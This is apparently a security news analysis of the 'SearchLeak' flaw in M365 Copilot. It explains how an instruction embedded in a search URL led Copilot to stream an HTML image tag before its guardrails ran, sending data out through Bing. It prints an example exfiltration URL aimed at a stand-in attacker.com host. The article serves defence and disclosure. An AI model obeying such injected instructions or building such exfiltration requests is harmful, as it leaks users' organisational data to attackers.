Our Take
The vulnerability exposes a structural problem: LLM safety guardrails execute too late to block data exfiltration that happens during response streaming.
Why it matters
Enterprise users running M365 are the target. A single click can expose not just personal emails but SharePoint documents, OneDrive files, meeting invites, and anything else the victim has access to.
Do this week
Enterprise security teams: audit M365 Copilot access logs before June 2026 to detect SearchLeak exploitation, then enforce zero-click protections on external link handling.
The exploit chain
Researchers at Varonis (per their disclosure) discovered that Copilot could be tricked into exfiltrating user data via a single email link. An attacker crafts a URL containing an instruction like https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. When a user clicks it, Copilot processes the embedded instruction without user confirmation.
The attack works because Copilot begins streaming a response before its guardrails activate. During that unguarded window, Copilot generates raw HTML containing an <img> tag. The browser immediately renders the tag and fires an HTTP request to fetch the image. By the time Copilot finishes generating and wraps the response in protective code blocks, the request has already left the victim's browser with stolen data attached.
To deliver the stolen data, researchers piggybacked on Microsoft's Bing search engine. Copilot's content security policy permits image requests to Bing. The attacker-controlled URL is embedded in the image request, so Bing relays it to the attacker's domain. A single click produces a request like https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png.
Enterprise blast radius
The vulnerability targets Copilot's Enterprise tier, which has access to organizational data. A victim's click can expose emails, meeting invites, notes, SharePoint documents, OneDrive files, and any other indexed business content. Depending on how M365 is connected to the broader environment, the blast radius could extend further.
Microsoft patched the specific vulnerabilities on Tuesday (per Varonis). However, the underlying architectural problem remains unsolved. As Varonis noted in their report, guardrails that fire after response generation cannot stop data exfiltration that occurs during streaming. Attackers will find new ways to bypass the next guardrail iteration.
What to do now
Enterprise teams should review M365 Copilot logs for signs of SearchLeak exploitation. Check for unusual Bing image-search requests originating from Copilot users, or API calls initiated by Copilot to external domains. Implement zero-click protections where possible: restrict the domains Copilot can contact, enforce multi-factor authentication on sensitive data access, and consider rate-limiting Copilot's ability to initiate outbound requests.
For vendors, the lesson is unavoidable: output sanitization that runs after text generation is not sufficient when streaming allows intermediate states to execute in the browser DOM before sanitization completes. The timing mismatch between safety and execution is the vulnerability, not the specific guardrail implementation.